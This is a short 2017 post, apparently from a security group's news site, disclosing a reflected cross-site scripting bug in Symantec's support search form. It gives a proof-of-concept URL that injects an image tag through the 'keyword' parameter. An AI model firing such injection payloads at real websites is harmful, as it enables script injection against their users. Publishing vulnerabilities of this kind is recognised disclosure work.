This site uses cookies. In order to read how we handle cookies please click here. Click on this message to accept and hide.
Gå till toppen
Русский, Россия English, United Kingdom
RSS
18.219.112.111.US
Nyheter Nyheter Arbete Arbete Nätverk Nätverk Forum Forum Galleri Galleri Hubblista Hubblista Verktyg Verktyg Statistik Statistik Om oss Om oss Logga in Logga in

They never learn: Symantec support page search form XSS bug

Vulnerable page: https://support.symantec.com/

PoC
https://support.symantec.com/en_US/search.html?keyword="><img src=http://www.te-home.net/gallery/xssd_by_teamelite.png>

You can either include any XSS code in search input box, or request any XSS code directly using GET method and keyword parameter.

PoC


Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Postat av RoLex den 2017-05-22 01:16 10 likes

Kommentarer

There are no comments for this news article, you can leave one here.
← Ledokol 2.9.3.46 | AdvOR 0.3.1.3 →
18.219.112.111.US Upphovsrätt © 2002-2024 Team Elite ⋅ Med ensamrätt ⋅ KakorHjälpKontakt 2 729 3980